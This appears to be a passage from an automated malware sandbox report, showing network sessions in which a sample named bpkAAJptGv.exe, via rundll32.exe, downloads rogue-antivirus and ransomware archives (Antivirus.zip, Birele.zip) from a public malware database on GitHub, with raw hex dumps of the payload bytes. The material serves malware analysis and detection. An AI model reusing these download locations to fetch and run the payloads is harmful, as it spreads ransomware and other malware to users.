                                                                                                                                                            2022-09-29 12:45:01 UTC7528INData Raw: 61 c3 50 77 b4 f4 36 dc 00 e9 66 86 ad 18 be 52 59 02 60 6a e0 7f 1c 2f d0 cf b8 65 b8 c9 63 16 21 04 26 22 44 6b 6c 86 ad a4 89 7e 36 88 f9 04 14 60 f7 74 20 b4 fa 68 3c 2b ac 76 81 e8 e8 4e 9f 88 5f 4e 25 2a 38 19 90 f7 7c f1 08 c7 bb 0f 46 1f f7 11 c6 a8 97 e2 cb bd fa 93 e6 15 c7 0d 7c 2f 05 23 ac c8 57 0b 4a 38 1b 7c 59 d0 22 72 6f 51 74 6d d6 fa 5f 83 ef da cd 1f 69 a8 e0 57 4c d9 5a e7 a0 01 80 e5 85 1c 89 e5 d9 8c fd 01 d1 15 e5 63 08 7b 9d 3d 44 69 7d 31 2a 6c 28 b1 7c be 4b 27 43 68 96 43 bf 1a c0 f0 7b ed 66 38 59 e9 0c 60 35 7c 0e f4 47 cb 30 91 55 82 4d a6 b1 29 7d 33 09 4d 44 c7 e2 9c 51 da 81 26 56 9b 40 1c af 77 0e 74 8a 50 96 97 4a f5 0d 36 ae 73 26 62 12 15 d1 87 e3 ea 47 1c 79 5f e8 35 2a b0 79 79 d4 8b c4 d3 9f e8 40 e6 89 09 e5 fa c7
                                                                                                                                                            Data Ascii: aPw6fRY`j/ec!&"Dkl~6`t h<+vN_N%*8|F|/#WJ8|Y"roQtm_iWLZc{=Di}1*l(|K'ChC{f8Y`5|G0UM)}3MDQ&V@wtPJ6s&bGy_5*yy@
                                                                                                                                                            2022-09-29 12:45:01 UTC7530INData Raw: 1c 5f b0 02 d9 16 34 4e 7a 93 71 76 c1 3c cc 3d 42 23 b6 9e 75 73 59 93 c4 88 e9 2d 3a ac 26 15 17 89 3d 3f 3f 58 58 c2 99 29 6b d0 27 43 2d e0 f3 2e bf 4f 71 52 9c cb ad 7e c8 d5 85 f9 57 3b c3 00 e3 d8 93 f7 5f 4e a6 76 f8 67 a9 00 bd d3 49 43 30 73 8e f1 1b 1c e8 6e 9b 85 fc e8 2b 3e d3 18 e1 94 3d f7 c2 df dc ef 97 6e 99 a2 77 16 90 da 15 e9 9a 94 c8 a8 35 1e bc 3b 87 fd 16 3c 6d c6 36 8d 78 87 73 c5 3f ca 44 f4 11 2f d6 02 a9 e3 39 1e 4c 9c 08 3e c5 74 8e 7f 94 c9 a4 24 c0 5e 49 04 27 74 ae dc 71 35 70 46 07 ca 34 40 d9 2f 1f 6b d1 b7 0c f6 fa 69 e6 55 15 24 81 99 1a 4a fd 44 22 56 13 78 11 aa 6e 6d 8f e0 46 25 1d e8 ee 3c 3b 90 64 b1 7a 3b b0 6a c5 93 e8 c9 0c 19 25 a4 2d 8b ec c9 7b 0a 89 14 74 d2 44 bf 1d 4b ea 5f 19 2f 8c 94 34 74 d6 78 f7 ce 89
                                                                                                                                                            Data Ascii: _4Nzqv<=B#usY-:&=??XX)k'C-.OqR~W;_NvgIC0sn+>=nw5;<m6xs?D/9L>t$^I'tq5pF4@/kiU$JD"VxnmF%<;dz;j%-{tDK_/4tx
                                                                                                                                                            2022-09-29 12:45:01 UTC7531INData Raw: 48 7b c5 33 46 47 c7 65 2e ad 1f 80 29 0b 1c 57 28 70 e4 de 76 91 ac 9f a5 da e2 e2 da 27 cd 8d f4 17 37 b7 1f 30 f1 1b d3 18 c2 56 41 f4 57 c9 04 f9 dd 69 b7 bb 9b fc 2f 82 b8 db 5d fa fb 40 ae 8d db da ca d1 24 6b 50 d3 be 8e 8a 79 47 e0 52 d5 5f fe 2c 78 d4 0b ae f8 0f ba 6c 68 c2 26 ff b6 6a 53 87 9b e8 31 51 5b 0b 42 95 0a d4 6f e2 6f b4 3c 6a 75 3c d7 ba d2 24 4c 33 06 9c b3 23 fa a5 bc a5 e3 15 f1 03 16 ab ab 61 4d 8b 6d 41 67 a5 37 d1 c1 e9 da c4 f8 fd e6 9b 68 64 2c 8f e6 3a da ac 5d ab 0f 0d 56 2b ed 2f 39 b2 52 81 54 64 cf b2 60 ef 74 fc 2f 96 1b 51 cd fd f8 9a 12 89 15 74 74 b7 72 24 65 a5 2c f9 f2 80 c0 8c b9 69 55 d4 81 45 e1 01 dd b8 82 d7 b3 83 9f 92 bd ff fc 82 ce ce 16 f1 7b 9b bb 5c 43 84 2e 55 dd 9c 49 f3 76 88 0a 02 26 56 dc 67 b5 b1
                                                                                                                                                            Data Ascii: H{3FGe.)W(pv'70VAWi/]@$kPyGR_,xlh&jS1Q[Boo<ju<$L3#aMmAg7hd,:]V+/9RTd`t/Qttr$e,iUE{\C.UIv&Vg
                                                                                                                                                            2022-09-29 12:45:01 UTC7532INData Raw: 5e 6b 33 bc 58 36 85 0b 3e 87 ad 4a d9 c8 0b 73 36 e7 bc eb b5 d4 50 23 a0 81 00 7c 5f 2a b1 d2 2c 54 be b3 99 69 aa c9 f0 26 1d 72 da 8a d6 c7 c2 4b 54 95 51 9b 21 a3 a7 ee f9 d6 b7 bb 67 f8 2b 44 a9 52 3a 83 20 60 fb a7 39 3e 6b 54 d4 d4 d9 35 3c c2 fa 95 fd 62 d4 58 47 f3 d8 54 66 d9 75 b1 ff 43 18 34 96 db 6d a7 76 32 51 06 d9 3c cd 32 24 2d c3 e8 0c 7e 9f 91 f1 01 c7 36 f2 61 82 5a 94 b3 79 0e cc ac c0 32 2a 2c 4d 44 c6 53 e8 db 18 be 7b 32 b3 4f 75 c2 a4 b2 d7 57 34 14 7e fd 02 4f 03 26 d3 1e 28 4e e5 5f e3 f3 02 d8 1e 02 42 ca 21 ff 93 df 50 8f b2 43 12 01 e5 25 44 7f 10 7d 3f 52 bb 31 cd 1f 5c 4c 47 69 a2 92 b4 07 c6 f5 6f 2d 01 e9 c5 e7 d5 32 3f 10 1a eb fa 80 72 47 08 10 ff fa 03 01 f0 ad d3 f7 53 c9 20 b9 0b 69 b4 72 4a 63 4d 25 88 98 22 9d cd
                                                                                                                                                            Data Ascii: ^k3X6>Js6P#|_*,Ti&rKTQ!g+DR: `9>kT5<bXGTfuC4mv2Q<2$-~6aZy2*,MDS{2OuW4~O&(N_B!PC%D}?R1\LGio-2?rGS irJcM%"
                                                                                                                                                            2022-09-29 12:45:01 UTC7534INData Raw: 73 8c 93 5f 16 a3 c4 b5 cb c6 a2 3c a5 c5 f5 42 12 2d a1 65 0f 26 35 53 a6 9d 32 46 c5 d9 fc b9 99 cc 73 e0 7f db ab 66 15 79 ec e3 8f 9c 98 c6 f3 84 f9 aa 76 92 78 be 77 2a ef f8 e8 2b e7 46 57 40 61 b0 1e 02 72 e1 e1 c2 d5 f4 09 af f9 0b 4d 78 a3 95 2f 2d e2 3a 8c ef 8b 91 f1 57 b1 3e d1 3f 2d 37 1a 5e 71 e8 0e 61 e7 98 2c 37 46 e9 b1 4e 40 4b eb 47 48 8f f8 3b 4f 36 b2 28 e1 57 ed ad e6 1c df b0 99 50 0c be b9 7a b7 ab 3a 0d d9 db c2 f1 d3 22 59 34 e1 7d 67 58 b4 fa 40 44 e8 cb e1 c9 ac 5e 3b 0a 51 74 1a 94 25 1a 93 fe 67 07 50 8a 1d a6 67 69 d7 3e 48 5d cc 9b 4e 35 a0 d4 58 31 55 32 e3 90 5a b2 e4 db 73 f4 9c 74 10 0a 60 37 9d 05 6c 67 a0 ab 08 b9 2b f5 dd 0e 2b e9 0e 75 72 30 40 d6 1f f4 20 dc 04 08 9a af 6c 52 72 af 11 b6 f1 c2 96 98 55 dd af f3 73
                                                                                                                                                            Data Ascii: s_<B-e&5S2Fsfyvxw*+FW@arMx/-:W>?-7^qa,7FN@KGH;O6(WPz:"Y4}gX@D^;Qt%gPgi>H]N5X1U2Zst`7lg++ur0@ lRrUs
                                                                                                                                                            2022-09-29 12:45:01 UTC7535INData Raw: bb a4 5c b2 31 34 86 d5 8e de a2 d6 e9 a0 c7 2d ee bd 02 88 19 86 ff 9b 89 66 bf a4 7f 1f 84 0c 72 a3 9f f5 71 0f e4 45 b7 47 b9 02 76 ee ee 75 08 42 41 b7 27 93 80 1e e5 d8 05 13 e6 fe fe e0 11 6d 8f 02 e8 91 af ec 1a 02 50 5a 89 56 41 4b 2d cd df 65 cf ed e3 fb a8 f4 80 16 27 77 98 4c 7c 86 45 8d d7 79 d0 ae c4 7e 7c 1f 59 68 fd d2 45 f5 31 02 8d ec d5 2a 57 58 89 c9 8c ff 97 24 f0 6e b9 c2 dd f3 7a dc 63 41 20 fe 1f 4c ba 7e 9c c5 1f df 81 74 35 52 90 17 81 de 78 de 08 e9 fc e3 d0 ce f1 1a bd b1 48 75 29 34 e7 f4 ee 31 c2 a4 d2 62 e7 16 9b 31 f1 11 c4 da fa 22 91 9e 17 2e 91 f2 b1 1a 3f bb a9 3c 62 1b 7e b4 f9 8e 4c 19 53 f3 9e bb 14 3a 0f d2 35 0a ea c9 85 1b 57 d6 f1 a5 99 a9 ce 47 cd a4 d6 36 46 1b 25 11 9b 63 01 2f b6 88 80 ad 99 53 2c 43 99 8a 8d
                                                                                                                                                            Data Ascii: \14-frqEGvuBA'mPZVAK-e'wL|Ey~|YhE1*WX$nzcA L~t5RxHu)41b1".?<b~LS:5WG6F%c/S,C
                                                                                                                                                            2022-09-29 12:45:01 UTC7536INData Raw: ab a8 cd c9 26 95 e6 d8 40 c6 4d a1 99 c4 61 99 9f eb 49 2a 90 f3 4a 34 4b 64 3b c7 43 05 5d 71 5e 08 a0 b5 3f 80 79 0b 7b f4 1b 92 29 8a 70 ec 12 b3 7a d1 27 40 c3 45 25 60 35 d0 c5 70 e7 ea f8 c2 ff c2 a3 0f e5 45 61 79 11 c8 bb f6 b3 30 5b 11 58 43 9d 0c aa 0f 97 3f 02 92 93 dc fb 86 5f e0 ec aa ad 6f 37 19 ab e9 d3 1f 96 73 c2 8e 40 97 28 61 21 9c 4e 63 90 19 d3 d6 59 1b 45 f1 45 a0 f8 0a ef 30 4b 36 27 19 a4 80 00 a8 a0 cc 4f c3 14 ab ec 43 df 76 91 62 cf db 8e 62 e4 e6 d5 fe 8c b0 15 6a 04 ae 9e a3 5e c3 89 e8 00 75 a2 a5 cc 21 96 88 b3 5e e9 06 dc 67 dd 6e 2c 8f f4 09 ff 05 18 7c b3 52 d9 d6 60 fa 98 df 35 d2 c7 94 2e 2f 00 b8 fa b7 ce 1c 01 80 8d 85 40 33 55 60 d1 5a 3e 2f 82 51 7f b3 a1 a4 82 84 2f 80 7f bb c6 8b f2 97 32 0d 93 29 56 97 a4 07 cd
                                                                                                                                                            Data Ascii: &@MaI*J4Kd;C]q^?y{)pz'@E%`5pEay0[XC?_o7s@(a!NcYEE0K6'OCvbbj^u!^gn,|R`5./@3U`Z>/Q/2)V
                                                                                                                                                            2022-09-29 12:45:01 UTC7538INData Raw: 65 09 5d 4a dc a6 c2 e3 23 af eb 96 8e ee 14 d4 9e 46 36 3b e9 de 53 03 eb 8b 08 0e 06 ec 96 da d1 87 58 36 f0 04 fb 49 92 64 bf 41 b5 55 d1 c0 c4 57 90 ac af e9 dc 6d ec aa a6 b4 8f e0 8d e0 c0 4a 84 20 5d 80 6b f1 23 62 83 eb a3 bd ff b4 1a 8d 2e 1f e9 b3 5a 89 49 eb 56 09 bd e7 a2 8e c3 33 59 e1 53 13 0d 3a 9e 0d 0f f3 de 52 9b 39 78 62 d8 82 78 08 b7 20 52 df cb 43 ec bd f7 ae 5c c5 11 fe 9a 6f be ed 1a 38 56 92 5a bc a7 a9 6e d7 0b 95 f5 4e af 5b c0 1c 23 da f6 ac 4b a0 cd b1 db c1 ee e0 b2 c3 b4 62 21 1d 5d f8 ef 34 06 39 df 50 03 a0 b7 1e 18 d5 17 84 0b f2 61 1f 65 36 d6 d6 00 22 65 3b 6a e9 c8 9e 51 d9 92 fc 5f 9f 76 50 3b 6f e7 eb bb 60 d5 38 66 10 a4 74 62 fc ac aa c2 73 84 21 6c de 21 40 0f e0 36 5b a6 84 0b 9c 8e 56 02 da fe 06 15 e9 a2 0c 0c
                                                                                                                                                            Data Ascii: e]J#F6;SX6IdAUWmJ ]k#b.ZIV3YS:R9xbx RC\o8VZnN[#Kb!]49Pae6"e;jQ_vP;o`8ftbs!l!@6[V
                                                                                                                                                            2022-09-29 12:45:01 UTC7539INData Raw: a5 98 f0 c0 34 d1 7d 12 29 c5 d1 1e a5 14 f9 e3 1b 99 5c 21 e4 24 fb 42 cb 67 e8 57 65 70 3a f2 f8 b3 ce 36 42 06 a8 4b 11 73 0e 43 79 0e 8a 3e 4e 4e 1d 89 4d 94 7a f9 5d 7e da 23 af a8 90 1e 19 91 8e 67 7a 11 3a 7f ef 59 50 3b 33 8b 08 b1 8c 71 14 a4 58 f8 8c 09 27 d7 0a 95 f2 7a c6 d8 b8 76 8c 8a 5b 4c 0b 01 3c 58 20 e4 87 79 4e 84 d0 4e 52 d2 f9 4b 98 56 46 de 64 3d 50 49 0a ef 30 e0 83 c3 33 2e 1b 1e 95 d2 6b 5d de eb dd d1 4f 73 49 3e 35 df 36 b3 79 10 29 c8 9f 61 d0 a0 7f 7d 43 63 eb 12 e8 a7 d1 58 11 54 ad c5 66 72 d9 e4 a7 d2 e3 0f 2a e2 c1 42 be 6a 62 80 98 ab 90 ba e3 46 07 44 bc d9 d8 7d 60 c9 68 73 cc 60 cb cf c7 d7 da cc aa a0 25 e3 ff e4 a1 09 7b df 7d 42 27 7a 6a 88 2c 50 48 be ee 62 1b cc c4 18 9c e5 d6 95 a9 bf 55 db 97 fe 43 3c d0 0c b7
                                                                                                                                                            Data Ascii: 4})\!$BgWep:6BKsCy>NNMz]~#gz:YP;3qX'zv[L<X yNNRKVFd=PI03.k]OsI>56y)a}CcXTfr*BjbFD}`hs`%{}B'zj,PHbUC<
                                                                                                                                                            2022-09-29 12:45:01 UTC7539INData Raw: 6b 56 ee aa 6f b2 e3 b6 42 e1 69 78 e4 b5 01 46 af 64 4d bc 5e 2d 66 05 56 ac b6 87 16 18 7b d3 e0 b8 d7 68 c2 ff d3 8f 3d 9a f9 19 47 89 65 72 de f9 5b 1c 8e 6c c3 3f d9 5e 3c d6 1a fa 2b 54 99 df 34 15 75 3d d5 36 ed 55 fd 0a 3a 38 4c 20 74 61 88 c5 ab 02 85 fa 4f bd dd 60 0a 2a c9 09 88 6f 42 87 ce e9 5f 69 67 49 67 7f 2b 6a 4c df b8 38 3c 53 7d b3 9b 6b 27 68 3f 6a 49 19 19 44 59 21 d4 e5 a8 9d b8 4b f7 05 df 96 e9 a8 96 fb 49 23 03 ed 98 4d 2a a4 4a 67 cc 47 8c 0e 32 7b dc 4a 1e 11 bb b6 0a af 3b cd 84 74 1e cc 74 84 86 8f 02 2d e9 c4 c9 2e e7 5a bf 3b 19 24 07 0b b3 d0 4c e4 e7 00 52 3e 2d dd 94 8d c3 59 71 88 2f e2 2c 7e 91 62 92 d5 0d 80 0a fe 94 d8 56 0f 41 2b 2a ac 14 28 33 7f fd aa 8a b0 af 14 2a 00 7e d6 22 0f aa 15 5f 92 9c 38 c6 70 49 f5 84
                                                                                                                                                            Data Ascii: kVoBixFdM^-fV{h=Ger[l?^<+T4u=6U:8L taO`*oB_igIg+jL8<S}k'h?jIDY!KI#M*JgG2{J;tt-.Z;$LR>-Yq/,~bVA+*(3*~"_8pI
                                                                                                                                                            2022-09-29 12:45:01 UTC7555INData Raw: 53 2e ad eb 73 3f 16 24 79 e2 05 7c 52 35 b9 b5 77 b9 58 0b e7 fd d2 e0 76 3c 17 c9 12 c5 2e e4 9e 36 e4 e8 56 6e 88 41 56 eb 47 3b a9 c0 e9 3a b7 fa 1c 44 75 50 84 d3 5b a0 5e cd 97 9d 2f bd 25 62 bb 7b 00 6e 42 7e 00 d7 f0 5c 2f b2 d8 4c f6 e8 d9 39 1c 80 41 5a 8e 1d e6 d5 fb ef 30 12 ee a6 b8 3b 59 e1 10 52 e8 06 2c 7c bd 68 50 c8 d9 06 a5 f6 bd d7 18 22 82 a9 72 14 a6 b8 61 12 f4 2d d4 24 d2 c3 a9 99 ec b2 55 72 e4 60 9b 4a 01 49 8a 02 ff 62 64 5d d4 b9 7b c0 1c eb a3 e4 4a 7d a8 73 4d 2a b6 de de 7f 38 fa 6d 61 80 fc a8 5f 2b d8 8a 08 e2 0f 87 51 ea c2 1b 50 39 8d ee 95 aa fc 58 8d 78 be 25 33 c3 d9 02 22 68 00 b2 ca 07 de a1 fe d5 95 2b 3d 06 fa b3 e1 28 4b 9f 66 21 0f 5c 92 64 46 83 b8 e7 ac a8 74 0e 31 2d 53 d2 d7 1c b5 41 b4 39 3f c7 19 cc a1 54
                                                                                                                                                            Data Ascii: S.s?$y|R5wXv<.6VnAVG;:DuP[^/%b{nB~\/L9AZ0;YR,|hP"ra-$Ur`JIbd]{J}sM*8ma_+QP9Xx%3"h+=(Kf!\dFt1-SA9?T
                                                                                                                                                            2022-09-29 12:45:01 UTC7571INData Raw: 83 6a bb 29 71 a8 35 51 69 eb 58 bc 29 82 5c db d2 1f b2 af 06 e3 c6 79 ee 31 78 75 c6 32 3f 8c f6 44 35 9d 70 46 ac 48 17 60 30 94 88 1d ed f8 1a 08 d4 4b 94 b3 79 07 e6 86 7f 57 84 91 ef b9 14 d7 55 5d a1 f9 94 2f f2 5b f3 7e aa 72 9a d8 14 63 f7 8e 92 bb 85 df 71 2e 44 43 dc 3b d1 88 f5 07 31 67 e1 24 cb f5 24 1c 79 8e 51 95 a5 1f 3e 04 c2 82 ff fe 52 4c 3f 57 d2 d6 ea a6 bc db 97 23 a9 f1 e2 1c bf 81 44 c5 a5 19 3a 4a 4b 37 69 cf 07 ef e9 fd 2d dd e3 4b c7 e2 f3 83 2a 32 d7 c0 81 c1 aa 46 91 ed 3e a2 5e 72 2f ea 75 be 40 0f de 34 53 62 29 9e 3c 60 b0 02 28 b6 39 83 e8 e1 5d bc 34 52 83 a9 a0 6c 99 66 87 a0 f6 12 d1 bb 31 0a 0c 8b 62 c3 de c6 f9 a1 cf b9 64 93 af e9 5d 42 89 29 9a 31 26 2d 80 c9 61 b5 5b cd 27 55 6f e4 c4 05 74 60 bd 71 15 a7 a3 8a 47
                                                                                                                                                            Data Ascii: j)q5QiX)\y1xu2?D5pFH`0KyWU]/[~rcq.DC;1g$$yQ>RL?W#D:JK7i-K*2F>^r/u@4Sb)<`(9]4Rlf1bd]B)1&-a['Uot`qG
                                                                                                                                                            2022-09-29 12:45:01 UTC7587INData Raw: 50 b8 06 87 f0 81 73 f1 5f 8d b2 c4 ef 7c ea 86 ca 02 23 17 e9 e0 44 cf 08 37 96 b8 e4 09 2a 25 32 99 30 8a 90 a2 10 6c 22 ae 5c 4e 9b 53 9f b2 77 79 64 9e 64 bf 87 c9 a5 97 66 7d 8a bc 77 77 fa 0b 6f 6f d8 67 b2 03 f9 a6 58 27 8b 7e 5e 5a a7 91 5a ad 08 c2 67 c8 d0 69 e8 09 99 41 d6 27 00 7c 7e 2b 36 a0 72 b5 10 ed a0 a1 0b 56 43 a4 fc 69 ec 91 69 86 6a ad 33 8e a0 83 01 df 2d b8 33 70 6b f6 44 50 61 b8 2d 68 2e 03 0d f5 12 60 4f d5 fc 10 2a 86 09 0e 5a a6 92 25 7a 37 47 ca ce c5 1a c2 67 63 3c 85 ad a0 fe 78 84 c4 3d 1b d2 3b dd b4 97 a3 3a b9 92 1e 23 4b c8 6c d0 b1 0f 36 59 cb e7 a0 f8 b9 d8 9a 89 5f c4 27 e0 3d fa cd 1e 42 e0 c4 5e d7 0d f1 39 63 ad 05 cc 4a b0 29 e5 b5 c4 f1 55 93 70 26 d5 d9 32 2c 11 fa f1 51 d3 e9 eb a9 6c 16 a7 7c b3 b1 99 90 b7
                                                                                                                                                            Data Ascii: Ps_|#D7*%20l"\NSwyddf}wwoogX'~^ZZgiA'|~+6rVCiij3-3pkDPa-h.`O*Z%z7Ggc<x=;:#Kl6Y_'=B^9cJ)Up&2,Ql|


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            58192.168.2.649737140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:01 UTC7599OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            59140.82.121.4443192.168.2.649737C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:01 UTC7600INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:19 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:01 UTC7600INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            6192.168.2.649711140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:46 UTC398OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            60192.168.2.649738185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:01 UTC7602OUTGET /Endermanch/MalwareDatabase/master/rogues/Antivirus.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            61185.199.110.133443192.168.2.649738C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:02 UTC7602INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 1410736
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "245193138e3f9b39cf44c134a58bf8b376783e8722bddc3a8150360e1df811da"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 082B:AB9E:ECAD7E:FC2F3E:6335934D
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:02 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6920-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455502.566793,VS0,VE456
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: be5ddaeecafed462d786b433b0cccc2b49787a3c
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:02 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:02 UTC7603INData Raw: 50 4b 03 04 14 00 01 00 08 00 07 13 99 43 46 06 5c d7 fa 85 15 00 00 8a 1f 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 74 69 76 69 72 75 73 2e 65 78 65 c6 7a f1 ff 6f 5f 2b 10 01 9f 9f e1 23 1b 17 e7 90 6d 67 f3 c3 f9 24 f2 59 57 1e ae 47 e5 70 43 6f 74 d3 73 c5 89 ff cc 24 c7 9e c3 ac d7 0a a2 52 de 99 d6 8b 1a 61 86 8b 3a 8a 7f ba a0 aa 63 ff 6c 89 3f a6 2c 72 ef 29 69 ae 9c 49 04 bf f3 7a 15 30 09 32 46 b3 35 83 df 62 92 46 b9 b1 59 06 cd 5d 8b 43 b1 1a 81 70 6f ca af 98 7f 22 13 fe 1d 95 a8 28 7f d5 3e 47 f6 a5 4d 36 8f 22 37 d9 7e 91 94 7d da 95 a4 c0 f6 56 43 62 16 e8 5f 2e 55 e0 4c eb f1 7f 05 c8 09 ee c1 82 9e a9 36 6f a6 d9 d4 c8 95 fa 88 a7 ce 2e 0d d1 9f 23 41 c5 a4 5b 09 88 31 b6 e0 f6 2e ae a8 b9 3d 9e fd 7d 10 72 10 c9 3d 42 20 0c
                                                                                                                                                            Data Ascii: PKCF\Endermanch@Antivirus.exezo_+#mg$YWGpCots$Ra:cl?,r)iIz02F5bFY]Cpo"(>GM6"7~}VCb_.UL6o.#A[1.=}r=B
                                                                                                                                                            2022-09-29 12:45:02 UTC7619INData Raw: 17 25 69 d2 37 6d 1f a3 b6 00 d2 cf 54 18 a3 7c c6 b6 d5 4b 2e 58 83 7a 70 cd 3f bb 1b 49 bd 8b c8 d3 41 57 ee 49 fc 86 ca 3b 4d e8 26 8a c9 52 c5 40 00 26 bf c2 fd 35 f0 8e 1a b7 10 af b0 ab a6 32 fb 27 18 d3 e8 69 b8 d0 d1 ac 97 01 16 a7 29 8b 91 84 6f ec f0 33 9f 76 e1 1c ac 4e 6f 4a f1 e2 20 94 77 f1 1d 4b 65 66 45 d2 82 0f a2 49 58 e8 66 d6 a5 34 fe 8b e8 a2 17 94 ec 9b 19 3f fc 1e a2 be 29 f4 2c ab 04 7c db cd b3 c4 a5 fd e3 2e 36 71 dc 42 da 62 6b 70 2f 6a 13 7e 2c 42 85 b3 b9 8a 34 7f fe c0 a6 97 3f 33 33 bd b2 da 74 da 62 39 ad 60 07 60 95 14 22 4e 94 b2 68 19 7d 36 b0 3e ab 4b 58 0f 0c 4a 30 02 c5 e4 b0 a6 00 10 4f d8 c1 f3 82 bb 50 db 21 a0 d8 5f 7d 81 0e ca 66 56 38 15 fa 32 f1 f0 f7 96 c9 05 47 45 75 ed 6b b6 b2 96 18 2c 5b e0 cf 73 2a 77 94
                                                                                                                                                            Data Ascii: %i7mT|K.Xzp?IAWI;M&R@&52'i)o3vNoJ wKefEIXf4?),|.6qBbkp/j~,B4?33tb9``"Nh}6>KXJ0OP!_}fV82GEuk,[s*w
